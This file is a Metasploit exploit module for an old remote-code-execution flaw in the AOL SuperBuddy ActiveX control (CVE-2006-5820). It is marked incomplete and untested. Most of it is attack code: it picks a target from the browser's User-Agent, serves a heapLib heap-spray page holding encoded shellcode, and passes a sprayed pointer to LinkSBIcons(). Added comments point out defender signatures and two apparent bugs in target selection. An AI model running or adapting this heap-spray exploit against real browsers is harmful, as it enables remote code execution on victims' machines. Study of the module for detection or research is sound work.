##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

##
# Browser-side module served through the HttpServer::HTML mixin: on each
# request it picks a target from the User-Agent, builds a heapLib spray page
# and calls LinkSBIcons() on the Sb.SuperBuddy ActiveX control (classid on
# the <object> tag in on_request_uri).  Marked INCOMPLETE and untested by its
# author; see the notes at the bottom of the file.
#
# Defender notes: the classid below is the identifier a kill-bit or ActiveX
# block-list entry would reference, and the served page has the usual
# heap-spray shape (heapLib.ie, unescape()'d payload, a 0x0c0c0c0c pointer
# argument) that content signatures commonly key on.
class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	# Module metadata.  Of the per-target hashes, only 'Offset' is read by the
	# visible code (interpolated into the spray JS in on_request_uri); the
	# 'Rop' key is never consulted here.
	#
	# @param info [Hash] module info merged via update_info
	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] American Online (AOL) SuperBuddy ActiveX LinkSBIcons() Remote Code Execution",
			'Description'    => %q{
				User-controlled pointer in LinkSBIcons() as as argument, enough said.
				This module has not been tested at all, because the vulnerable version of AOL
				hasn't been found.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'Cody Pierce',  #Initial discovery
					'sinn3r',       #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2006-5820' ],
					[ 'OSVDB', '34318' ],
					[ 'BID', '23224' ],
					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/23224.msf' ]
				],
			'Payload'        =>
				{
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "process",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			# 'Offset' is a string and is dropped into the JS substring() call as-is.
			# Index 0 is the 'Automatic' placeholder; get_target maps a User-Agent to
			# one of the concrete entries.  The IE 8 entry is commented out, so the
			# list has four entries (indices 0-3).
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Rop' => false,  'Offset' => '0x5F4' } ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => false,  'Offset' => '0x5F4' } ],
					#[ 'IE 8 on Windows XP SP3', { 'Rop' => true,   'Offset' => '0x5f4' } ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => false,  'Offset' => '0x5f4' } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 8 2006",
			'DefaultTarget'  => 0))
	end

	# Resolve the target for a request.
	#
	# @param agent [String, nil] the request's User-Agent header (the caller
	#   uses agent.to_s, so nil is possible; nil =~ /re/ is nil and falls
	#   through to the else branch)
	# @return [Hash, nil] the selected target, or nil when the browser/OS pair
	#   has no entry
	def get_target(agent)
		# If a target was already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		# Automatic mode: pair the Windows NT version with the MSIE major version.
		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP2/SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		#elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
		#	return targets[3]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			# NOTE(review): if `targets` mirrors the 'Targets' list in initialize,
			# it has indices 0-3 (the IE 8 entry is commented out), so targets[4]
			# is nil and this branch takes the "not supported" path in on_request_uri.
			return targets[4]  #IE 7 on Windows Vista
		else
			return nil
		end
	end

	# HttpServer callback: serve the spray page to a supported browser, or a
	# 404 to anything else.
	#
	# @param cli the client connection; only peerhost/peerport are read here,
	#   for the log lines
	# @param request the parsed HTTP request; only the User-Agent header is read
	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
			send_not_found(cli)
			return
		end

		# NOTE(review): the endianness comes from `target` (the user-selected
		# entry, which may be the 'Automatic' placeholder), not from the
		# auto-detected `my_target` used everywhere else in this method.
		js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		# The heap spraying routine.  The heredoc is JavaScript; the #{...}
		# expressions are expanded here in Ruby, so the target's 'Offset' string
		# lands in the substring() call verbatim.
		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{my_target['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();

		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}
		JS

		# heaplib() comes from the HttpServer::HTML mixin and presumably prepends
		# the heapLib helper that the spray references as heapLib.ie; :noobfu
		# looks like it disables JS obfuscation — TODO confirm against the mixin.
		spray = heaplib(spray, {:noobfu => true})

		# 0c0c0c0c = 202116108: the pointer handed to LinkSBIcons() below.  The
		# sprayed blocks are padded with the \x0c bytes from js_nops so that this
		# address falls inside the spray.
		html = <<-EOS
		<html>
		<head>
		<script>
		#{spray}
		</script>
		</head>
		<body>
		<object id="aol" classid="clsid:189504B8-50D1-4AA8-B4D6-95C8F58A6414" width="0" height="0"></object>
		<script>
		aol.LinkSBIcons(0x0c0c0c0c);
		</script>
		</body>
		</html>
		EOS

		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
end

=begin
C:\Program Files\AOL 9.0\sb.dll
new ActiveXObject("Sb.SuperBuddy.1")

The vulnerability is confirmed in AOL 9.0 Revision 4156.910. Other versions may also be affected.
Also, according to ZDI, the software is automatically patched when the user logs on to AOL

WAOL_0.4327.134.zip  <--- not vulnerable
WAOL_0.4156.910.zip  <--- vulnerable. But good luck finding this one.

https://secunia.com/advisories/24714/3/
http://www.securityfocus.com/archive/1/archive/1/464313/100/0/threaded
http://www.symantec.com/business/security_response/writeup.jsp?docid=2007-011917-1403-99
http://jsunpack.jeek.org/dec/go?report=38c888e7ad2030b21c5fd240b12c5b2a8dc8015e

http://dev.metasploit.com/redmine/issues/5459
=end
